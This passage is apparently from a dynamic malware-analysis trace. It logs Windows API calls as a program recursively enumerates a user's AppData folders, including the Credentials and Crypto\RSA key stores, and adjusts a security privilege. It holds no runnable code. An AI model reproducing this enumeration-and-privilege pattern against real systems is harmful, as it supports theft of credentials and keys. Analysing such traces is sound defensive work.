returned 0 [0056.994] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", lpSrch="microsoft") returned="Microsoft" [0056.994] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", lpSrch="firefox") returned 0x0 [0056.995] Sleep (dwMilliseconds=0x0) [0057.041] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.041] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun" [0057.041] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned 0 [0057.041] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", lpSrch="microsoft") returned 0x0 [0057.041] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", lpSrch="firefox") returned 0x0 [0057.041] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*" [0057.042] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0xb071d8 [0057.042] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.042] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.042] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0057.042] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 0 [0057.043] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", lpSrch="microsoft") returned 0x0 [0057.043] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", lpSrch="firefox") returned 0x0 [0057.043] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*" [0057.043] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0xb07158 [0057.043] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.043] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.043] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment" [0057.043] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned 1 [0057.044] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", lpSrch="microsoft") returned 0x0 [0057.044] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", lpSrch="firefox") returned 0x0 [0057.044] PathCombineW (in: pszDest=0x9ad4e0, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0057.044] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0xb07558 [0057.044] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 1 [0057.045] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0 [0057.045] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.045] Sleep (dwMilliseconds=0x0) [0057.087] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0 [0057.087] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.088] Sleep (dwMilliseconds=0x0) [0057.134] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0 [0057.134] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.135] Sleep (dwMilliseconds=0x0) [0057.196] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 0 [0057.196] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.200] GetCurrentThread () returned 0xfffffffe [0057.200] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x9ae6c4 | out: TokenHandle=0x9ae6c4*=0x0) returned 0 [0057.200] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x9ae6c4 | out: TokenHandle=0x9ae6c4*=0x210) returned 1 [0057.200] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x9ae6cc | out: lpLuid=0x9ae6cc*(LowPart=0x8, HighPart=0)) returned 1 [0057.201] AdjustTokenPrivileges (in: TokenHandle=0x210, DisableAllPrivileges=0, NewState=0x9ae6c8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0057.201] GetLastError () returned 0x0 [0057.201] CloseHandle (hObject=0x210) returned 1 [0057.201] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0057.201] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0xb0c5b0, lpbSaclPresent=0x9ae6fc, pSacl=0x9ae6f0, lpbSaclDefaulted=0x9ae6f8 | out: lpbSaclPresent=0x9ae6fc, pSacl=0x9ae6f0, lpbSaclDefaulted=0x9ae6f8) returned 1 [0057.201] SetNamedSecurityInfoW () returned 0x0 [0057.207] LocalFree (hMem=0xb0c5b0) returned 0x0 [0057.207] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*" [0057.207] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*", lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 0xb070d8 [0057.207] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.207] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.208] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe" [0057.208] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*" [0057.208] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb071d8 [0057.208] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.208] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.208] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0057.208] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0057.208] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0057.209] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.209] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.209] PathMatchSpecW (pszFile="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe", pszSpec="*") returned 1 [0057.209] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.209] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0057.209] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0057.209] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.210] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.210] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.210] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.210] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.210] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.210] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.211] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.211] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.211] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft" [0057.211] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*" [0057.211] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07358 [0057.212] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.212] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.212] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials" [0057.213] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0057.213] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07318 [0057.213] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.213] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.213] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.213] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.214] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto" [0057.214] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0057.214] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0057.214] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.214] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.214] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0057.214] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0057.214] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.215] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.215] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.215] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-3582695476-958571460-1978946630-1000" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000" [0057.215] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*" [0057.215] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0057.216] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.216] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.216] PathMatchSpecW (pszFile="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033", pszSpec="*") returned 1 [0057.217] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.217] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_8c74eee4-8873-4eb3-9315-336075ff5033", pszSpec="*") returned 1 [0057.217] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.217] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.218] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.218] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.218] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.218] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.218] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.218] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0057.219] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0057.219] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0057.219] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.219] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.219] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0057.219] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0057.219] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07558 [0057.220] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.220] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.220] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.220] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.220] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0057.220] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.220] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*") returned 1 [0057.220] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.220] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0057.220] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0057.220] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb071d8 [0057.221] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.221] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.221] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0057.221] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0057.221] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.221] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.222] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.222] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.222] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.222] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0057.222] PathCombineW (in: pszDest=0x9ace20, 